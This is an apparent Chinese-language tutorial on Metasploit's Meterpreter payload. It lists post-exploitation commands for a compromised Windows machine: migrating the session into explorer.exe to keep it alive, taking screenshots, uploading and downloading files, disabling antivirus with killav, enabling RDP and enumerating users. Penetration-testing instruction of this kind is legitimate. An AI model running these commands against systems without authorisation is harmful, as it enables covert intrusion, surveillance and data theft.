内容
- Meterpreter简介
- Meterpreter优点
- Meterpreter基本命令
Meterpreter简介
- Meterpreter是MSF中的一个杀手锏,通常作为漏洞溢出后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给我们一个控制通道
- Meterpreter是MSF的一个扩展模块,可以调用MSF的一些功能,对目标系统进行更为深入的渗透,这些功能包括反追踪、纯内存工作模式、密码哈希值获取、特权提升、跳板攻击等等
Meterpreter优点
- 纯内存工作模式,不需要对磁盘进行任何写入操作
- 使用加密通信协议,而且可以同时与几个信道通信
- 在被攻击进程内工作,不需要创建新的进程
- 易于在多进程之间迁移
- 平台通用,适用于Windows、Linux、BSD系统,并支持Inter x86和Inter x64平台
Meterpreter基本命令
在获得系统的Meterpreter会话之后,可以利用一些基本的Meterpreter命令,来收集更多的信息。可以输入help命令查看使用,这里我们列举一部分
1、进程迁移
在刚获得Meterpreter Shell时,该Shell是极其脆弱和易受攻击的,所以第一步就是要移动这个Shell,把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作。
输入ps命令获取目标机正在运行的进程
输入getpid命令查看Meterpreter Shell的进程号
输入migrate 3224命令(3224是当前Explorer.exe进程的PID)把Shell移动到PID为3224的Explorer.exe进程里,因为该进程是一个稳定的应用。只要Explorer.exe进程一直运行,当前的meterpreter会话就不会中断。常常利用此命令将meterpreter移植到一些一直不会关闭的进程中,可以最大程度的保证meterpreter的寿命。
完成进程迁移后,再次输入getpid命令查看Meterpreter Shell的进程号,发现PID已经变成了3224,说明已经成功迁移到Explorer.exe进程里。
进程迁移完成后,原先PID为1172的进程会自动关闭,如果没有自动关闭可以输入kill 1172命令来结束该进程。
使用自动迁移进程命令,系统会自动寻找合适的进程然后迁移
//Meterpreter Shell
run post/windows/manage/migrate //自动迁移进程命令2、系统命令
获得了稳定的进程后,接下来收集系统信息
sysinfo:这个命令可以获取系统运行的平台
screenshot:截屏
background:将当前的session放到后台运行,可以在msf中继续其他的渗透任务。此命令适合在多个Meterpreter会话的场景下使用
sessions
- 这个命令需要配合上面的background来使用
- sessions:查看已经成功获取的会话
- sessions -i ID:连接到执行ID的meterpreter会话已继续利用
getuid:获取运行Meterpreter会话的用户名
upload:upload 源文件路径 目的文件路径
download :download 目标文件路径 本地路径
execute:在目标机中执行文件
查看目标机是否运行在虚拟机上
run post/windows/gather/checkvm
idletime命令查看运行时间
输入route命令查看目标机完整的网络设置
run post/windows/manage/killav //关闭目标机系统杀软
run post/windows/manage/enable_rdp //启动目标机的远程桌面协议
run post/windows/manage/autoroute //查看目标机的本地子网情况
run post/windows/gather/enum_logged_on_users //列举有多少用户登录了目标机
run post/windows/gather/enum_applications //列举安装在目标机上的应用程序输入shell命令进入目标机Shell下面
输入exit命令可以停止Shell会话并返回Meterpreter。最后输入exit命令停止Meterpreter会话。
文件系统命令
pwd 查看当前处于目标机的哪个目录
getwd 查看当前处于目标机的哪个目录
getlwd 查看当前处于本地的哪个目录
ls 列出当前目录中的所有文件
cd 切换目录search命令:搜索执行类型的文件
- -f参数:用于指定搜索文件模式
- -d参数:用于指定在哪个目录下进行搜索
